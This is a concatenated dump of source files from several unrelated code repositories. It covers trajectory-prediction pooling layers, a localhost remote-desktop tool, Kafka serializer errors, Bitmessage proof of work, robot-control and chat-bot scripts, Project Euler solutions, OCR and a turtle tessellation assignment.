## Deleting Diagonal (Ped wrt itself)
## [num_tracks, num_tracks, 2] --> [num_tracks, num_tracks-1, 2]
relative = relative[~torch.eye(num_tracks).bool()].reshape(num_tracks, num_tracks-1, 2)
## Generate Occupancy Map
return self.occupancy(obs2, relative, past_obs=obs1)
def social(self, hidden_state, obs1, obs2):
## Makes the Social Grid
num_tracks = obs2.size(0)
## if only primary pedestrian present
if num_tracks == 1:
return self.occupancy(obs2, None, past_obs=obs1)
## Generate values to input in hiddenstate grid tensor (compressed hidden-states in this case)
## [num_tracks, hidden_dim] --> [num_tracks, num_tracks-1, pooling_dim]
hidden_state_grid = hidden_state.repeat(num_tracks, 1).view(num_tracks, num_tracks, -1)
hidden_state_grid = hidden_state_grid[~torch.eye(num_tracks).bool()].reshape(num_tracks, num_tracks-1, -1)
hidden_state_grid = self.hidden_dim_encoding(hidden_state_grid)
## Generate Occupancy Map
return self.occupancy(obs2, hidden_state_grid, past_obs=obs1)
def dir_social(self, hidden_state, obs1, obs2):
## Makes the Directional + Social Grid
num_tracks = obs2.size(0)
## if only primary pedestrian present
if num_tracks == 1:
return self.occupancy(obs2, None)
## Generate values to input in directional grid tensor (relative velocities in this case)
vel = obs2 - obs1
unfolded = vel.unsqueeze(0).repeat(vel.size(0), 1, 1)
## [num_tracks, 2] --> [num_tracks, num_tracks, 2]
relative = unfolded - vel.unsqueeze(1)
## Deleting Diagonal (Ped wrt itself)
## [num_tracks, num_tracks, 2] --> [num_tracks, num_tracks-1, 2]
relative = relative[~torch.eye(num_tracks).bool()].reshape(num_tracks, num_tracks-1, 2)
## Generate values to input in hiddenstate grid tensor (compressed hidden-states in this case)
## [num_tracks, hidden_dim] --> [num_tracks, num_tracks-1, pooling_dim]
hidden_state_grid = hidden_state.repeat(num_tracks, 1).view(num_tracks, num_tracks, -1)
hidden_state_grid = hidden_state_grid[~torch.eye(num_tracks).bool()].reshape(num_tracks, num_tracks-1, -1)
hidden_state_grid = self.hidden_dim_encoding(hidden_state_grid)
dir_social_rep = torch.cat([relative, hidden_state_grid], dim=2)
## Generate Occupancy Map
return self.occupancy(obs2, dir_social_rep, past_obs=obs1)
@staticmethod
def normalize(relative, obs, past_obs):
## Normalize pooling grid along direction of pedestrian motion
diff = torch.cat([obs[:, 1:] - past_obs[:, 1:], obs[:, 0:1] - past_obs[:, 0:1]], dim=1)
velocity = np.arctan2(diff[:, 0].clone(), diff[:, 1].clone())
theta = (np.pi / 2) - velocity
ct = torch.cos(theta)
st = torch.sin(theta)
## Cleaner?
relative = torch.stack([torch.einsum('tc,ci->ti', pos_instance, torch.Tensor([[ct[i], st[i]], [-st[i], ct[i]]])) for
i, pos_instance in enumerate(relative)], dim=0)
return relative
def occupancy(self, obs, other_values=None, past_obs=None):
"""Returns the occupancy map filled with respective attributes.
A different occupancy map with respect to each pedestrian
Parameters
----------
obs: Tensor [num_tracks, 2]
Current x-y positions of all pedestrians, used to construct occupancy map.
other_values: Tensor [num_tracks, num_tracks-1, 2]
Attributes (self.pooling_dim) of the neighbours relative to pedestrians, to be filled in the occupancy map
e.g. Relative velocities of pedestrians
past_obs: Tensor [num_tracks, 2]
Previous x-y positions of all pedestrians, used to construct occupancy map.
Useful for normalizing the grid tensor.
Returns
-------
grid: Tensor [num_tracks, self.pooling_dim, self.n, self.n]
"""
num_tracks = obs.size(0)
##mask unseen
mask = torch.isnan(obs).any(dim=1)
obs[mask] = 0
## if only primary pedestrian present
if num_tracks == 1:
return self.constant*torch.ones(1, self.pooling_dim, self.n, self.n, device=obs.device)
## Get relative position
## [num_tracks, 2] --> [num_tracks, num_tracks, 2]
unfolded = obs.unsqueeze(0).repeat(obs.size(0), 1, 1)
relative = unfolded - obs.unsqueeze(1)
## Deleting Diagonal (Ped wrt itself)
## [num_tracks, num_tracks, 2] --> [num_tracks, num_tracks-1, 2]
relative = relative[~torch.eye(num_tracks).bool()].reshape(num_tracks, num_tracks-1, 2)
## In case of 'occupancy' pooling
if other_values is None:
other_values = torch.ones(num_tracks, num_tracks-1, self.pooling_dim, device=obs.device)
## Normalize pooling grid along direction of pedestrian motion
if self.norm_pool:
relative = self.normalize(relative, obs, past_obs)
if self.front:
oij = (relative / (self.cell_side / self.pool_size) + torch.Tensor([self.n * self.pool_size / 2, 0]))
else:
oij = (relative / (self.cell_side / self.pool_size) + self.n * self.pool_size / 2)
range_violations = torch.sum((oij < 0) + (oij >= self.n * self.pool_size), dim=2)
range_mask = range_violations == 0
oij[~range_mask] = 0
other_values[~range_mask] = self.constant
oij = oij.long()
## Flatten
oi = oij[:, :, 0] * self.n * self.pool_size + oij[:, :, 1]
# faster occupancy
occ = self.constant*torch.ones(num_tracks, self.n**2 * self.pool_size**2, self.pooling_dim, device=obs.device)
## Fill occupancy map with attributes
occ[torch.arange(occ.size(0)).unsqueeze(1), oi] = other_values
occ = torch.transpose(occ, 1, 2)
occ_2d = occ.view(num_tracks, -1, self.n * self.pool_size, self.n * self.pool_size)
if self.blur_size == 1:
occ_blurred = occ_2d
else:
occ_blurred = torch.nn.functional.avg_pool2d(
occ_2d, self.blur_size, 1, int(self.blur_size / 2), count_include_pad=True)
occ_summed = torch.nn.functional.lp_pool2d(occ_blurred, 1, self.pool_size)
# occ_summed = torch.nn.functional.avg_pool2d(occ_blurred, self.pool_size) # faster?
return occ_summed
## Architectures of Encoding Grid
def one_layer(self, input_dim=None):
if input_dim is None:
input_dim = self.n * self.n * self.pooling_dim
return torch.nn.Sequential(
torch.nn.Linear(input_dim, self.out_dim),
torch.nn.ReLU(),)
## Default Layer Dims: 1024
def conv_two_layer(self, input_dim=None, layer_dims=None):
## Similar to twoLayer. Will be removed in future version
if input_dim is None:
input_dim = self.n * self.n * self.pooling_dim
return torch.nn.Sequential(
torch.nn.Flatten(),
torch.nn.Linear(input_dim, layer_dims[0]),
torch.nn.ReLU(),
torch.nn.Linear(layer_dims[0], self.out_dim),
torch.nn.ReLU(),)
## Default Layer Dims: 1024
def two_layer(self, input_dim=None, layer_dims=None):
if input_dim is None:
input_dim = self.n * self.n * self.pooling_dim
return torch.nn.Sequential(
torch.nn.Linear(input_dim, layer_dims[0]),
torch.nn.ReLU(),
torch.nn.Linear(layer_dims[0], self.out_dim),
torch.nn.ReLU(),)
## Default Layer Dims: 1024, 512
def three_layer(self, input_dim=None, layer_dims=None):
if input_dim is None:
input_dim = self.n * self.n * self.pooling_dim
return torch.nn.Sequential(
torch.nn.Linear(input_dim, layer_dims[0]),
torch.nn.ReLU(),
torch.nn.Linear(layer_dims[0], layer_dims[1]),
torch.nn.ReLU(),
torch.nn.Linear(layer_dims[1], self.out_dim),
torch.nn.ReLU(),)
def lstm_layer(self, hidden_dim):
self.hidden_dim = hidden_dim
self.pool_lstm = torch.nn.LSTMCell(self.out_dim, self.hidden_dim)
self.hidden2pool = torch.nn.Linear(self.hidden_dim, self.out_dim)
return torch.nn.Sequential(
torch.nn.Linear(self.n * self.n * self.pooling_dim, self.out_dim),
torch.nn.ReLU(),)
def reset(self, num_tracks, device):
self.track_mask = None
if self.embedding_arch == 'lstm_layer':
self.hidden_cell_state = (
[torch.zeros(self.hidden_dim, device=device) for _ in range(num_tracks)],
[torch.zeros(self.hidden_dim, device=device) for _ in range(num_tracks)],
)
def lstm_forward(self, grid):
""" Forward process for LSTM-based grid encoding"""
grid_embedding = self.embedding(grid)
num_tracks = grid.size(0)
## If only primary pedestrian of the scene present
if torch.sum(self.track_mask).item() == 1:
return torch.zeros(num_tracks, self.out_dim, device=grid.device)
hidden_cell_stacked = [
torch.stack([h for m, h in zip(self.track_mask, self.hidden_cell_state[0]) if m], dim=0),
torch.stack([c for m, c in zip(self.track_mask, self.hidden_cell_state[1]) if m], dim=0),
]
## Update interaction-encoder LSTM
hidden_cell_stacked = self.pool_lstm(grid_embedding, hidden_cell_stacked)
interaction_vector = self.hidden2pool(hidden_cell_stacked[0])
## Save hidden-cell-states
mask_index = [i for i, m in enumerate(self.track_mask) if m]
for i, h, c in zip(mask_index,
hidden_cell_stacked[0],
hidden_cell_stacked[1]):
self.hidden_cell_state[0][i] = h
self.hidden_cell_state[1][i] = c
return interaction_vector
def make_grid(self, obs):
""" Make the grids for all time-steps together
Only supports Occupancy and Directional pooling
"""
if obs.ndim == 2:
obs = obs.unsqueeze(0)
timesteps = obs.size(0)
grid = []
for i in range(1, timesteps):
obs1 = obs[i-1]
obs2 = obs[i]
## Remove NANs
track_mask = (torch.isnan(obs1[:, 0]) + torch.isnan(obs2[:, 0])) == 0
obs1, obs2 = obs1[track_mask], obs2[track_mask]
if self.type_ == 'occupancy':
grid.append(self.occupancies(obs1, obs2))
elif self.type_ == 'directional':
grid.append(self.directional(obs1, obs2))
return grid
```
#### File: Asymmetrical-Bi-RNNs-to-encode-pedestrian-trajectories/Social-NCE_U-LSTM/more_non_gridbased_pooling.py
```python
from collections import defaultdict
import torch
class NMMP(torch.nn.Module):
""" Interaction vector is obtained by message passing between
hidden-state of all neighbours. Proposed in NMMP, CVPR 2020
Parameters:
mlp_dim: embedding size of hidden-state
k: number of iterations of message passing
out_dim: dimension of resultant interaction vector
Attributes
----------
mlp_dim : Scalar
Embedding dimension of hidden-state of LSTM
k : Scalar
Number of iterations of message passing
out_dim: Scalar
Dimension of resultant interaction vector
"""
def __init__(self, hidden_dim=128, mlp_dim=32, k=5, out_dim=None):
super(NMMP, self).__init__()
self.out_dim = out_dim or hidden_dim
self.hidden_embedding = torch.nn.Sequential(
torch.nn.Linear(hidden_dim, mlp_dim),
torch.nn.ReLU(),
)
self.mlp_dim = mlp_dim
self.node_to_edge_embedding = torch.nn.Linear(2*mlp_dim, mlp_dim)
self.edge_to_node_embedding = torch.nn.Linear(2*mlp_dim, mlp_dim)
self.out_projection = torch.nn.Linear(mlp_dim, self.out_dim)
self.k = k
def message_pass(self, node_embeddings):
# Perform a single iteration of message passing
n = node_embeddings.size(0)
arrange1 = node_embeddings.repeat(n, 1, 1) ## c
arrange2 = arrange1.transpose(0, 1) ## d
## e_out
e_out_all = torch.cat([arrange2, arrange1], dim=2)
e_out_neighbours = e_out_all[~torch.eye(n).bool()].reshape(n, n-1, 2*self.mlp_dim)
e_out_edges = self.node_to_edge_embedding(e_out_neighbours)
e_out_sumpool = torch.mean(e_out_edges, dim=1)
## e_in
e_in_all = torch.cat([arrange1, arrange2], dim=2)
e_in_neighbours = e_in_all[~torch.eye(n).bool()].reshape(n, n-1, 2*self.mlp_dim)
e_in_edges = self.node_to_edge_embedding(e_in_neighbours)
e_in_sumpool = torch.mean(e_in_edges, dim=1)
## [e_in; e_out]
concat_nodes = torch.cat([e_in_sumpool, e_out_sumpool], dim=1)
## refined node
refined_embeddings = self.edge_to_node_embedding(concat_nodes)
return refined_embeddings
def reset(self, _, device):
self.track_mask = None
def forward(self, hidden_states, _, obs2):
## If only primary present
num_tracks = obs2.size(0)
if num_tracks == 1:
return torch.zeros(1, self.out_dim, device=obs2.device)
## Embed hidden-state
node_embeddings = self.hidden_embedding(hidden_states)
## Iterative Message Passing
for _ in range(self.k):
node_embeddings = self.message_pass(node_embeddings)
return self.out_projection(node_embeddings)
``` |
{
"source": "josephGhobadi/irdc",
"score": 3
} |
#### File: josephGhobadi/irdc/FfmpegBinding.py
```python
import os
import platform
import subprocess
import screeninfo
class ffmpeg:
def __init__(self, port):
self.ffmpeg_command = ""
self.platform = platform.system()
self.current_file_address = os.path.dirname(os.path.abspath(__file__))
''' make commands '''
self.make_ffmpeg_command(port)
''' ffmpeg process '''
self.process = None
self.run_ffmpeg()
def make_ffmpeg_command(self, port):
ffmpeg_arguments = " -hide_banner -loglevel panic"
if self.platform == "Linux":
ffmpeg_arguments = ffmpeg_arguments + " -video_size "
ffmpeg_arguments = ffmpeg_arguments + str(screeninfo.get_monitors()[0].width) + "x"
ffmpeg_arguments = ffmpeg_arguments + str(screeninfo.get_monitors()[0].height)
ffmpeg_arguments = ffmpeg_arguments + " -f x11grab -i " + os.environ['DISPLAY'] + " "
elif self.platform == "Windows":
ffmpeg_arguments = ffmpeg_arguments + ffmpeg_arguments + " -f gdigrab "
ffmpeg_arguments = ffmpeg_arguments + "-framerate 15"
ffmpeg_arguments = ffmpeg_arguments + " -rtsp_transport tcp -f rtsp rtsp://localhost:" + str(port) + "/test"
if self.platform == "Linux":
self.ffmpeg_command = self.current_file_address + "/bin/unix/ffmpeg" + ffmpeg_arguments
elif self.platform == "Windows":
self.ffmpeg_command = self.current_file_address + "\\bin\\windows\\ffmpeg.exe" + ffmpeg_arguments
def check_alive(self):
try:
os.kill(self.process.pid, 0)
return True
except OSError:
return False
def run_ffmpeg(self):
self.process = subprocess.Popen(self.ffmpeg_command, shell=True,
stdin=None, stdout=None, stderr=None, close_fds=True)
def __del__(self):
self.process.kill()
```
#### File: josephGhobadi/irdc/WsCommandServer.py
```python
import asyncio
import json
import inspect
import pyautogui
import websockets
class WsCommandServer:
async def mouse_press(self, params):
pyautogui.mouseDown(button=params["button"], x=params["x"], y=params["y"])
pass
async def mouse_release(self, params):
pyautogui.mouseUp(button=params["button"], x=params["x"], y=params["y"])
pass
async def keyboard_press(self, params):
pyautogui.keyDown(params['code'])
pass
async def keyboard_release(self, params):
pyautogui.keyDown(params['code'])
pass
async def commands_switch(self, websocket, path):
async for message in websocket:
data = json.loads(message)
class_methods = [i for i in dir(WsCommandServer) if not inspect.isfunction(i) and '__' not in i]
if data["command"] in class_methods:
func = getattr(self, data["command"])
await func(data["params"])
else:
print("unrecognizable action!")
def run_ws_server():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
asyncio.get_event_loop().run_until_complete(
websockets.serve(WsCommandServer().commands_switch, 'localhost', 1553))
asyncio.get_event_loop().run_forever()
``` |
{
"source": "josephglanville/confluent-kafka-python",
"score": 3
} |
#### File: avro/serializer/__init__.py
```python
class SerializerError(Exception):
"""Generic error from serializer package"""
def __init__(self, message):
self.message = message
def __repr__(self):
return '{klass}(error={error})'.format(
klass=self.__class__.__name__,
error=self.message
)
def __str__(self):
return self.message
class KeySerializerError(SerializerError):
pass
class ValueSerializerError(SerializerError):
pass
``` |
{
"source": "JosephGoulden/PyBitmessageF2F",
"score": 2
} |
#### File: PyBitmessageF2F/src/proofofwork.py
```python
import hashlib
from struct import unpack, pack
import sys
from shared import config, frozen
import shared
#import os
def _set_idle():
if 'linux' in sys.platform:
import os
os.nice(20) # @UndefinedVariable
else:
try:
sys.getwindowsversion()
import win32api,win32process,win32con # @UnresolvedImport
pid = win32api.GetCurrentProcessId()
handle = win32api.OpenProcess(win32con.PROCESS_ALL_ACCESS, True, pid)
win32process.SetPriorityClass(handle, win32process.IDLE_PRIORITY_CLASS)
except:
#Windows 64-bit
pass
def _pool_worker(nonce, initialHash, target, pool_size):
_set_idle()
trialValue = float('inf')
while trialValue > target:
nonce += pool_size
trialValue, = unpack('>Q',hashlib.sha512(hashlib.sha512(pack('>Q',nonce) + initialHash).digest()).digest()[0:8])
return [trialValue, nonce]
def _doSafePoW(target, initialHash):
nonce = 0
trialValue = float('inf')
while trialValue > target:
nonce += 1
trialValue, = unpack('>Q',hashlib.sha512(hashlib.sha512(pack('>Q',nonce) + initialHash).digest()).digest()[0:8])
return [trialValue, nonce]
def _doFastPoW(target, initialHash):
import time
from multiprocessing import Pool, cpu_count
try:
pool_size = cpu_count()
except:
pool_size = 4
try:
maxCores = config.getint('bitmessagesettings', 'maxcores')
except:
maxCores = 99999
if pool_size > maxCores:
pool_size = maxCores
pool = Pool(processes=pool_size)
result = []
for i in range(pool_size):
result.append(pool.apply_async(_pool_worker, args = (i, initialHash, target, pool_size)))
while True:
if shared.shutdown >= 1:
pool.terminate()
while True:
time.sleep(10) # Don't let this thread return here; it will return nothing and cause an exception in bitmessagemain.py
return
for i in range(pool_size):
if result[i].ready():
result = result[i].get()
pool.terminate()
pool.join() #Wait for the workers to exit...
return result[0], result[1]
time.sleep(0.2)
def run(target, initialHash):
target = int(target)
if frozen == "macosx_app" or not frozen:
return _doFastPoW(target, initialHash)
else:
return _doSafePoW(target, initialHash)
``` |
{
"source": "JosephGregg/robotstreamer",
"score": 3
} |
#### File: JosephGregg/robotstreamer/gopigo_interface.py
```python
import sys
import time
import gopigo
import robot_util
def handleCommand(command, keyPosition):
# only uses pressing down of keys
if keyPosition != "down":
return
print("handle command", command, keyPosition)
if command == 'L':
gopigo.left_rot()
time.sleep(0.15)
gopigo.stop()
if command == 'R':
gopigo.right_rot()
time.sleep(0.15)
gopigo.stop()
if command == 'F':
gopigo.forward()
time.sleep(0.4)
gopigo.stop()
if command == 'B':
gopigo.backward()
time.sleep(0.3)
gopigo.stop()
robot_util.handleSoundCommand(command, keyPosition)
```
#### File: robotstreamer/player/player.py
```python
import os
import asyncio
import websockets
import time
import argparse
import json
import _thread
import traceback
import subprocess
import urllib
import urllib.request
config = json.load(open('config.json'))
userID = "26"
chatEndpoint = {'host': '192.168.3.11', 'port': 8765}
parser = argparse.ArgumentParser(description='robotstreamer chat bot')
commandArgs = parser.parse_args()
def jsonResponsePOST(url, jsonObject):
print("json object to POST", jsonObject)
params = json.dumps(jsonObject).encode('utf8')
req = urllib.request.Request(url, data=params,
headers={'content-type': 'application/json'})
response = urllib.request.urlopen(req)
jsonResponse = json.loads(response.read())
print("response:", jsonResponse)
return jsonResponse
async def handleStatusMessages():
global mainWebsocket
print("running handle status messages")
url = 'ws://%s:%s' % (chatEndpoint['host'], chatEndpoint['port'])
print("chat url:", url)
async with websockets.connect(url) as websocket:
mainWebsocket = websocket
print("connected to service at", url)
print("chat websocket object:", websocket)
print("starting websocket.send")
#await websocket.send(json.dumps({"type":"connect",
# "robot_id":1,
# "local_address":"1"}))
while True:
print("awaiting message, this is optional (Ctrl-Break in Windows to Break)")
message = await websocket.recv()
print("received message:", message)
async def handleUpdateMessages():
global mainWebsocket
count = 0
print("start update")
while True:
time.sleep(2)
print("sending")
m = "!play https://youtubewhatever to play a song"
if count % 2 == 0:
m = m + " "
print("message to send:", m)
await mainWebsocket.send(json.dumps({"message": m,
"token": config['jwt_user_token']}))
count += 1
time.sleep(160*5)
def startStatus():
print("starting status")
try:
asyncio.new_event_loop().run_until_complete(handleStatusMessages())
except:
print("error")
traceback.print_exc()
def startUpdateMessages():
print("starting status")
try:
asyncio.new_event_loop().run_until_complete(handleUpdateMessages())
except:
print("error")
traceback.print_exc()
def main():
print(commandArgs)
print("starting chat bot")
_thread.start_new_thread(startStatus, ())
_thread.start_new_thread(startUpdateMessages, ())
# wait forever
while True:
time.sleep(5)
if __name__ == '__main__':
main()
```
#### File: JosephGregg/robotstreamer/vibrate.py
```python
from math import sin
from robot_util import times
from Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_DCMotor
import time
vibrateSystemActive = False
def setMotorSpeed(mh, motorIndex, direction, s):
motor = mh.getMotor(motorIndex+1)
#print("direction", direction)
if direction == 1:
motor.setSpeed(s)
motor.run(Adafruit_MotorHAT.FORWARD)
if direction == -1:
motor.setSpeed(s)
motor.run(Adafruit_MotorHAT.BACKWARD)
def vibrate(mh, forwardDefinition):
global vibrateSystemActive
if vibrateSystemActive:
print("skip")
else:
vibrateSystemActive = True
for i in range(60):
a = float(i) / 1.0
speed = int(sin(a) * 255.0)
print("speed", speed)
if speed >= 0:
directions = forwardDefinition
else:
directions = times(forwardDefinition, -1)
speed = -speed
print(speed, directions)
for motorIndex in range(4):
setMotorSpeed(mh,
motorIndex,
directions[motorIndex],
speed)
time.sleep(0.05)
turnOffMotors(mh)
vibrateSystemActive = False
#todo: this function should be in a file shared by this and rsbot
def turnOffMotors(mh):
mh.getMotor(1).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(2).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(3).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(4).run(Adafruit_MotorHAT.RELEASE)
def main():
mh = Adafruit_MotorHAT(addr=0x60)
vibrate(mh, [-1,1,-1,1])
if __name__ == "__main__":
main()
``` |
{
"source": "josephhaddad55/project-euler",
"score": 4
} |
#### File: josephhaddad55/project-euler/euler1.py
```python
def find_sum_multiples(n: int, first_multiple: int, second_multiple: int) -> int:
result = 0
for i in range(0, n):
if i % first_multiple == 0 or i % second_multiple == 0:
result += i
return result
if __name__ == "__main__":
assert find_sum_multiples(1000, 3, 5) == 233168
```
#### File: josephhaddad55/project-euler/euler2.py
```python
def find_even_sum_fib() -> int:
a, b = 1, 2
result = 0
while b < 4e6:
if b % 2 == 0:
result += b
b = a + b
a = b - a
return result
if __name__ == "__main__":
assert find_even_sum_fib() == 4613732
``` |
{
"source": "josephhaddad55/supreme-waddle-ocr",
"score": 3
} |
#### File: josephhaddad55/supreme-waddle-ocr/read.py
```python
import time
from PIL import Image
from pytesseract import image_to_string
def read_image():
# Log the time
time_start = time.time()
# Object to capture results
text_from_image = {}
# Try to read the image
try:
print("Reading image ...\n")
text_from_image = image_to_string(
Image.open("./dump-ticket.jpeg"),
lang="eng",
config="",
nice=0,
output_type="dict",
)
except Exception as e:
print(e)
print(f"It took {time.time() - time_start} seconds for conversion. \n")
return text_from_image
if __name__ == "__main__":
print(read_image())
``` |
{
"source": "Joseph-Haddad/Joseph-Haddad-Portfolio",
"score": 3
} |
#### File: Joseph-Haddad/Joseph-Haddad-Portfolio/tessellation.py
```python
from turtle import *
from math import *
from random import *
# Define constant values used in the main program that sets up
# the drawing canvas. Do not change any of these values.
cell_size = 100 # pixels (default is 100)
grid_width = 10 # squares (default is 10)
grid_height = 7 # squares (default is 7)
x_margin = cell_size * 2.75 # pixels, the size of the margin left/right of the grid
y_margin = cell_size // 2 # pixels, the size of the margin below/above the grid
window_height = grid_height * cell_size + y_margin * 2
window_width = grid_width * cell_size + x_margin * 2
small_font = ('Arial', 18, 'normal') # font for the coords
big_font = ('Arial', 24, 'normal') # font for any other text
# Validity checks on grid size - do not change this code
assert cell_size >= 80, 'Cells must be at least 80x80 pixels in size'
assert grid_width >= 8, 'Grid must be at least 8 squares wide'
assert grid_height >= 6, 'Grid must be at least 6 squares high'
#
#--------------------------------------------------------------------#
#-----Functions for Creating the Drawing Canvas----------------------#
#
# The functions in this section are called by the main program to
# manage the drawing canvas for your image. You should not change
# any of the code in this section.
#
# Set up the canvas and draw the background for the overall image
def create_drawing_canvas(bg_colour = 'light blue',
line_colour = 'slate grey',
draw_grid = True, mark_legend = False):
# Set up the drawing canvas with enough space for the grid and
# legend
setup(window_width, window_height)
bgcolor(bg_colour)
# Draw as quickly as possible
tracer(False)
# Get ready to draw the grid
penup()
color(line_colour)
width(2)
# Determine the left-bottom coords of the grid
left_edge = -(grid_width * cell_size) // 2
bottom_edge = -(grid_height * cell_size) // 2
# Optionally draw the grid
if draw_grid:
# Draw the horizontal grid lines
setheading(0) # face east
for line_no in range(0, grid_height + 1):
penup()
goto(left_edge, bottom_edge + line_no * cell_size)
pendown()
forward(grid_width * cell_size)
# Draw the vertical grid lines
setheading(90) # face north
for line_no in range(0, grid_width + 1):
penup()
goto(left_edge + line_no * cell_size, bottom_edge)
pendown()
forward(grid_height * cell_size)
# Draw each of the labels on the x axis
penup()
y_offset = 27 # pixels
for x_label in range(0, grid_width):
goto(left_edge + (x_label * cell_size) + (cell_size // 2), bottom_edge - y_offset)
write(chr(x_label + ord('A')), align = 'center', font = small_font)
# Draw each of the labels on the y axis
penup()
x_offset, y_offset = 7, 10 # pixels
for y_label in range(0, grid_height):
goto(left_edge - x_offset, bottom_edge + (y_label * cell_size) + (cell_size // 2) - y_offset)
write(str(y_label + 1), align = 'right', font = small_font)
# Mark centre coordinate (0, 0)
home()
dot(15)
# Optionally mark the spaces for drawing the legend
if mark_legend:
# Left side
goto(-(grid_width * cell_size) // 2 - 75, -25)
write('Put your\nlegend here', align = 'right', font = big_font)
# Right side
goto((grid_width * cell_size) // 2 + 75, -25)
write('Put your\nlegend here', align = 'left', font = big_font)
# Reset everything ready for the student's solution
pencolor('black')
width(1)
penup()
home()
tracer(True)
# End the program and release the drawing canvas to the operating
# system. By default the cursor (turtle) is hidden when the
# program ends - call the function with False as the argument to
# prevent this.
def release_drawing_canvas(hide_cursor = True):
tracer(True) # ensure any drawing still in progress is displayed
if hide_cursor:
hideturtle()
done()
#
#--------------------------------------------------------------------#
#-----Test Data for Use During Code Development----------------------#
#
# The "fixed" data sets in this section are provided to help you
# develop and test your code. You can use them as the argument to
# the "tesselate" function while perfecting your solution. However,
# they will NOT be used to assess your program. Your solution will
# be assessed using the "random_pattern" function appearing below.
# Your program must work correctly for any data set that can be
# generated by the random_pattern function.
#
# Each of the data sets is a list of instructions, each specifying
# where to place a particular tile. The general form of each
# instruction is
#
# [squares, mystery_value]
#
# where there may be one, two or four squares in the grid listed
# at the beginning. This tells us which grid squares must be
# filled by this particular tile. This information also tells
# us which shape of tile to produce. A "big" tile will occupy
# four grid squares, a "small" tile will occupy one square, a
# "wide" tile will occupy two squares in the same row, and a
# "tall" tile will occupy two squares in the same column. The
# purpose of the "mystery value" will be revealed in Part B of
# the assignment.
#
# Note that the fixed patterns below assume the grid has its
# default size of 10x7 squares.
#
# Some starting points - the following fixed patterns place
# just a single tile in the grid, in one of the corners.
# Small tile
fixed_pattern_0 = [['A1', 'O']]
fixed_pattern_1 = [['J7', 'X']]
# Wide tile
fixed_pattern_2 = [['A7', 'B7', 'O']]
fixed_pattern_3 = [['I1', 'J1', 'X']]
# Tall tile
fixed_pattern_4 = [['A1', 'A2', 'O']]
fixed_pattern_5 = [['J6', 'J7', 'X']]
# Big tile
fixed_pattern_6 = [['A6', 'B6', 'A7', 'B7', 'O']]
fixed_pattern_7 = [['I1', 'J1', 'I2', 'J2', 'X']]
# Each of these patterns puts multiple copies of the same
# type of tile in the grid.
# Small tiles
fixed_pattern_8 = [['E1', 'O'],
['J4', 'O'],
['C5', 'O'],
['B1', 'O'],
['I1', 'O']]
fixed_pattern_9 = [['C6', 'X'],
['I4', 'X'],
['D6', 'X'],
['J5', 'X'],
['F6', 'X'],
['F7', 'X']]
# Wide tiles
fixed_pattern_10 = [['A4', 'B4', 'O'],
['C1', 'D1', 'O'],
['C7', 'D7', 'O'],
['A7', 'B7', 'O'],
['D4', 'E4', 'O']]
fixed_pattern_11 = [['D7', 'E7', 'X'],
['G7', 'H7', 'X'],
['H5', 'I5', 'X'],
['B3', 'C3', 'X']]
# Tall tiles
fixed_pattern_12 = [['J2', 'J3', 'O'],
['E5', 'E6', 'O'],
['I1', 'I2', 'O'],
['E1', 'E2', 'O'],
['D3', 'D4', 'O']]
fixed_pattern_13 = [['H4', 'H5', 'X'],
['F1', 'F2', 'X'],
['E2', 'E3', 'X'],
['C4', 'C5', 'X']]
# Big tiles
fixed_pattern_14 = [['E5', 'F5', 'E6', 'F6', 'O'],
['I5', 'J5', 'I6', 'J6', 'O'],
['C2', 'D2', 'C3', 'D3', 'O'],
['H2', 'I2', 'H3', 'I3', 'O'],
['A3', 'B3', 'A4', 'B4', 'O']]
fixed_pattern_15 = [['G2', 'H2', 'G3', 'H3', 'X'],
['E5', 'F5', 'E6', 'F6', 'X'],
['E3', 'F3', 'E4', 'F4', 'X'],
['B3', 'C3', 'B4', 'C4', 'X']]
# Each of these patterns puts one instance of each type
# of tile in the grid.
fixed_pattern_16 = [['I5', 'O'],
['E1', 'F1', 'E2', 'F2', 'O'],
['J5', 'J6', 'O'],
['G7', 'H7', 'O']]
fixed_pattern_17 = [['G7', 'H7', 'X'],
['B7', 'X'],
['A5', 'B5', 'A6', 'B6', 'X'],
['D2', 'D3', 'X']]
# If you want to create your own test data sets put them here,
# otherwise call function random_pattern to obtain data sets
# that fill the entire grid with tiles.
#
#--------------------------------------------------------------------#
#-----Function for Assessing Your Solution---------------------------#
#
# The function in this section will be used to assess your solution.
# Do not change any of the code in this section.
#
# The following function creates a random data set specifying a
# tessellation to draw. Your program must work for any data set that
# can be returned by this function. The results returned by calling
# this function will be used as the argument to your "tessellate"
# function during marking. For convenience during code development
# and marking this function also prints the pattern to be drawn to the
# shell window. NB: Your solution should not print anything else to
# the shell. Make sure any debugging calls to the "print" function
# are disabled before you submit your solution.
#
# This function attempts to place tiles using a largest-to-smallest
# greedy algorithm. However, it randomises the placement of the
# tiles and makes no attempt to avoid trying the same location more
# than once, so it's not very efficient and doesn't maximise the
# number of larger tiles placed. In the worst case, only one big
# tile will be placed in the grid (but this is very unlikely)!
#
# As well as the coordinates for each tile, an additional value which
# is either an 'O' or 'X' accompanies each one. The purpose of this
# "mystery" value will be revealed in Part B of the assignment.
#
def random_pattern(print_pattern = True):
# Keep track of squares already occupied
been_there = []
# Initialise the pattern
pattern = []
# Percent chance of the mystery value being an X
mystery_probability = 8
# Attempt to place as many 2x2 tiles as possible, up to a fixed limit
attempts = 10
while attempts > 0:
# Choose a random bottom-left location
column = randint(0, grid_width - 2)
row = randint(0, grid_height - 2)
# Try to place the tile there, provided the spaces are all free
if (not [column, row] in been_there) and \
(not [column, row + 1] in been_there) and \
(not [column + 1, row] in been_there) and \
(not [column + 1, row + 1] in been_there):
been_there = been_there + [[column, row], [column, row + 1],
[column + 1, row], [column + 1, row + 1]]
# Append the tile's coords to the pattern, plus the mystery value
pattern.append([chr(column + ord('A')) + str(row + 1),
chr(column + ord('A') + 1) + str(row + 1),
chr(column + ord('A')) + str(row + 2),
chr(column + ord('A') + 1) + str(row + 2),
'X' if randint(1, 100) <= mystery_probability else 'O'])
# Keep track of the number of attempts
attempts = attempts - 1
# Attempt to place as many 1x2 tiles as possible, up to a fixed limit
attempts = 15
while attempts > 0:
# Choose a random bottom-left location
column = randint(0, grid_width - 1)
row = randint(0, grid_height - 2)
# Try to place the tile there, provided the spaces are both free
if (not [column, row] in been_there) and \
(not [column, row + 1] in been_there):
